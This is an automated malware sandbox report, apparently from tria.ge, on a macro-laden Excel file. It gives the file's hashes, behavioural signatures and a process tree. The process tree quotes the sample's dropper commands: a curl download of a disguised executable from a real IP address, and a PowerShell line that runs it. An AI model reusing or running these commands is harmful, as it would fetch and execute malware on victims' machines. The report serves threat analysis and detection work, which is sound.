Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
26/12/2023, 00:36
Behavioral task
behavioral1
Sample
46d6bdb8d65ae1dd0726c7d5e05e5f39.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
46d6bdb8d65ae1dd0726c7d5e05e5f39.xlsm
Resource
win10v2004-20231222-en
General
-
Target
46d6bdb8d65ae1dd0726c7d5e05e5f39.xlsm
-
Size
117KB
-
MD5
46d6bdb8d65ae1dd0726c7d5e05e5f39
-
SHA1
c7a01da1bd8c051583acd3f028c42602e7d75271
-
SHA256
fe017705d35cefdee2a98d7c319f62c6f44e47614d4548784832788517e2bc90
-
SHA512
cc0af73db9ea0fdb8b3354bc02642d1191f43703936b66c0d663c25f2cef20d9a86f9b1a782cc7ccd278e0a4c2462e05c253eeeca53a70f3adcc9d3e60d750ba
-
SSDEEP
1536:nSaJx8anJumqeFxBrCQ5GMJhj4x0RBxu07ZG5o3wnAIQEUKtP3HjEN:n3GsoQswMmJZGugAtQ3ju
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3616 1648 cmd.exe 22 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3768 1648 powershell.exe 22 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1648 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3768 powershell.exe 3768 powershell.exe 3768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3768 powershell.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE 1648 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1648 wrote to memory of 3768 1648 EXCEL.EXE 99 PID 1648 wrote to memory of 3768 1648 EXCEL.EXE 99 PID 1648 wrote to memory of 3616 1648 EXCEL.EXE 97 PID 1648 wrote to memory of 3616 1648 EXCEL.EXE 97 PID 3616 wrote to memory of 1488 3616 cmd.exe 102 PID 3616 wrote to memory of 1488 3616 cmd.exe 102 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\46d6bdb8d65ae1dd0726c7d5e05e5f39.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SYSTEM32\cmd.execmd /c curl http://151.236.30.123/images/suntogether.png -o %appdata%\RgPFG.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\curl.execurl http://151.236.30.123/images/suntogether.png -o C:\Users\Admin\AppData\Roaming\RgPFG.exe3⤵PID:1488
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe start-sleep 10; $x=$env:AppData+'\RgPFG.exe';Invoke-Expression $x2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3768
-